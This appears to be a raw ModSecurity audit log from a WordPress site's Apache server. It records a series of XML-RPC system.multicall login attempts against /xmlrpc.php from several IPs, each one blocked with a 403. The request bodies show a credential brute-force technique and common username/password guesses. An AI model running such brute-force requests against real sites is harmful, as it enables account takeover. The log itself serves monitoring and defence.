X-Forwarded-Server: bogl.no X-Forwarded-For: 103.82.25.111 X-Forwarded-Proto: https Connection: close Content-Length: 477 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --db23a05b-C-- system.multicallmethodNamewp.getUsersBlogsparamstestantix --db23a05b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db23a05b-E-- --db23a05b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.82.25.111 (2+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749102107874309 6275 (- - -) Stopwatch2: 1749102107874309 6275; combined=4471, p1=512, p2=3729, p3=0, p4=0, p5=132, sr=83, sw=98, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db23a05b-Z-- --06b92812-A-- [05/Jun/2025:12:47:48 +0700] aEEvhCrHpfaS2Cuwh8XURQAAAFI 103.236.140.4 36422 103.236.140.4 8181 --06b92812-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 198.154.250.110 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 198.154.250.110 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --06b92812-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin7 --06b92812-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --06b92812-E-- --06b92812-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 198.154.250.110 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749102468627562 4644 (- - -) Stopwatch2: 1749102468627562 4644; combined=3526, p1=397, p2=2970, p3=0, p4=0, p5=93, sr=79, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06b92812-Z-- --2361051f-A-- [05/Jun/2025:12:48:51 +0700] aEEvw-th7G2xELALzPYiSQAAAMQ 103.236.140.4 36456 103.236.140.4 8181 --2361051f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 69.49.228.101 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 69.49.228.101 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --2361051f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSolehweb --2361051f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2361051f-E-- --2361051f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 69.49.228.101 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749102531761592 4547 (- - -) Stopwatch2: 1749102531761592 4547; combined=3537, p1=379, p2=2992, p3=0, p4=0, p5=97, sr=84, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2361051f-Z-- --bd18ba54-A-- [05/Jun/2025:12:49:28 +0700] aEEv6H-K7ToMdu-YSIIkegAAAAI 103.236.140.4 36478 103.236.140.4 8181 --bd18ba54-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.82.25.111 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.82.25.111 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --bd18ba54-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh1997 --bd18ba54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd18ba54-E-- --bd18ba54-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.82.25.111 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749102568192987 6095 (- - -) Stopwatch2: 1749102568192987 6095; combined=4269, p1=546, p2=3530, p3=0, p4=0, p5=114, sr=98, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd18ba54-Z-- --b9b80906-A-- [05/Jun/2025:12:49:53 +0700] aEEwAeth7G2xELALzPYiVQAAANQ 103.236.140.4 36488 103.236.140.4 8181 --b9b80906-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 198.154.250.110 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 198.154.250.110 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b9b80906-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh.2019 --b9b80906-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9b80906-E-- --b9b80906-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 198.154.250.110 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749102593880529 4538 (- - -) Stopwatch2: 1749102593880529 4538; combined=3547, p1=372, p2=3010, p3=0, p4=0, p5=96, sr=82, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9b80906-Z-- --7d4c475f-A-- [05/Jun/2025:12:52:19 +0700] aEEwk1wdJdhOudw5hdzPPgAAAIM 103.236.140.4 36608 103.236.140.4 8181 --7d4c475f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 69.49.228.101 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 69.49.228.101 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7d4c475f-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmin123123 --7d4c475f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d4c475f-E-- --7d4c475f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 69.49.228.101 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749102739637026 5011 (- - -) Stopwatch2: 1749102739637026 5011; combined=3754, p1=447, p2=3138, p3=0, p4=0, p5=98, sr=107, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d4c475f-Z-- --1fe89518-A-- [05/Jun/2025:12:56:36 +0700] aEExlOth7G2xELALzPYiqwAAAME 103.236.140.4 36760 103.236.140.4 8181 --1fe89518-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 69.49.228.101 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 69.49.228.101 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --1fe89518-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh.2021 --1fe89518-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fe89518-E-- --1fe89518-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 69.49.228.101 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749102996683342 4724 (- - -) Stopwatch2: 1749102996683342 4724; combined=3626, p1=378, p2=3075, p3=0, p4=0, p5=101, sr=81, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fe89518-Z-- --014ec202-A-- [05/Jun/2025:12:56:47 +0700] aEExn-th7G2xELALzPYirQAAAMM 103.236.140.4 36766 103.236.140.4 8181 --014ec202-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.253 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.253 X-Forwarded-Proto: https Connection: close Content-Length: 474 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --014ec202-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmin1 --014ec202-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --014ec202-E-- --014ec202-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 91.134.248.253 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103007935953 6078 (- - -) Stopwatch2: 1749103007935953 6078; combined=4287, p1=538, p2=3584, p3=0, p4=0, p5=99, sr=104, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --014ec202-Z-- --6c907f29-A-- [05/Jun/2025:12:57:11 +0700] aEExt-th7G2xELALzPYitQAAAMs 103.236.140.4 36784 103.236.140.4 8181 --6c907f29-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 198.154.250.110 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 198.154.250.110 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6c907f29-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin121 --6c907f29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c907f29-E-- --6c907f29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 198.154.250.110 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103031143541 4653 (- - -) Stopwatch2: 1749103031143541 4653; combined=3620, p1=379, p2=3076, p3=0, p4=0, p5=96, sr=80, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c907f29-Z-- --4069bc5a-A-- [05/Jun/2025:12:58:07 +0700] aEEx7-th7G2xELALzPYiwQAAANY 103.236.140.4 36820 103.236.140.4 8181 --4069bc5a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.215.172.242 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.215.172.242 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --4069bc5a-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminPassword --4069bc5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4069bc5a-E-- --4069bc5a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.215.172.242 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103087337103 5042 (- - -) Stopwatch2: 1749103087337103 5042; combined=3775, p1=448, p2=3166, p3=0, p4=0, p5=95, sr=82, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4069bc5a-Z-- --33246543-A-- [05/Jun/2025:12:58:08 +0700] aEEx8Oth7G2xELALzPYiwgAAANg 103.236.140.4 36822 103.236.140.4 8181 --33246543-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.253 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.253 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --33246543-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin123456! --33246543-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33246543-E-- --33246543-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 91.134.248.253 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103088944377 4577 (- - -) Stopwatch2: 1749103088944377 4577; combined=3526, p1=384, p2=2976, p3=0, p4=0, p5=97, sr=83, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33246543-Z-- --49043e78-A-- [05/Jun/2025:12:58:22 +0700] aEEx_lwdJdhOudw5hdzPUgAAAJg 103.236.140.4 36838 103.236.140.4 8181 --49043e78-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.82.25.111 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.82.25.111 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --49043e78-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin!@#123 --49043e78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --49043e78-E-- --49043e78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.82.25.111 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103102684875 4820 (- - -) Stopwatch2: 1749103102684875 4820; combined=3729, p1=407, p2=3138, p3=0, p4=0, p5=108, sr=82, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49043e78-Z-- --a2054375-A-- [05/Jun/2025:12:59:24 +0700] aEEyPOth7G2xELALzPYiywAAAMk 103.236.140.4 36852 103.236.140.4 8181 --a2054375-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 69.49.228.101 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 69.49.228.101 X-Forwarded-Proto: https Connection: close Content-Length: 476 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a2054375-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmin123 --a2054375-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2054375-E-- --a2054375-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 69.49.228.101 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103164319302 5800 (- - -) Stopwatch2: 1749103164319302 5800; combined=4135, p1=497, p2=3465, p3=0, p4=0, p5=102, sr=91, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2054375-Z-- --6e6bb52c-A-- [05/Jun/2025:13:00:05 +0700] aEEyZeth7G2xELALzPYi0wAAANE 103.236.140.4 36878 103.236.140.4 8181 --6e6bb52c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.215.172.242 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.215.172.242 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6e6bb52c-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh121 --6e6bb52c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e6bb52c-E-- --6e6bb52c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.215.172.242 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103205503740 5849 (- - -) Stopwatch2: 1749103205503740 5849; combined=4130, p1=519, p2=3411, p3=0, p4=0, p5=115, sr=90, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e6bb52c-Z-- --b4984431-A-- [05/Jun/2025:13:00:47 +0700] aEEyj-th7G2xELALzPYi3gAAAMQ 103.236.140.4 36908 103.236.140.4 8181 --b4984431-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 198.154.250.110 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 198.154.250.110 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b4984431-C-- system.multicallmethodNamewp.getUsersBlogsparamswp_updatesw0rdpr3ss --b4984431-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4984431-E-- --b4984431-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 198.154.250.110 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103247196861 5791 (- - -) Stopwatch2: 1749103247196861 5791; combined=4161, p1=540, p2=3341, p3=0, p4=0, p5=155, sr=130, sw=125, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4984431-Z-- --8b0bbe46-A-- [05/Jun/2025:13:01:35 +0700] aEEyv-th7G2xELALzPYi8QAAAMc 103.236.140.4 36954 103.236.140.4 8181 --8b0bbe46-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.253.43.167 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.253.43.167 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8b0bbe46-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAa123456 --8b0bbe46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b0bbe46-E-- --8b0bbe46-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.253.43.167 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103295606206 4951 (- - -) Stopwatch2: 1749103295606206 4951; combined=3698, p1=384, p2=3142, p3=0, p4=0, p5=104, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b0bbe46-Z-- --29dca246-A-- [05/Jun/2025:13:01:51 +0700] aEEyz-th7G2xELALzPYi-AAAAM4 103.236.140.4 36972 103.236.140.4 8181 --29dca246-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 152.53.50.108 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 152.53.50.108 X-Forwarded-Proto: https Connection: close Content-Length: 477 Accept: */* 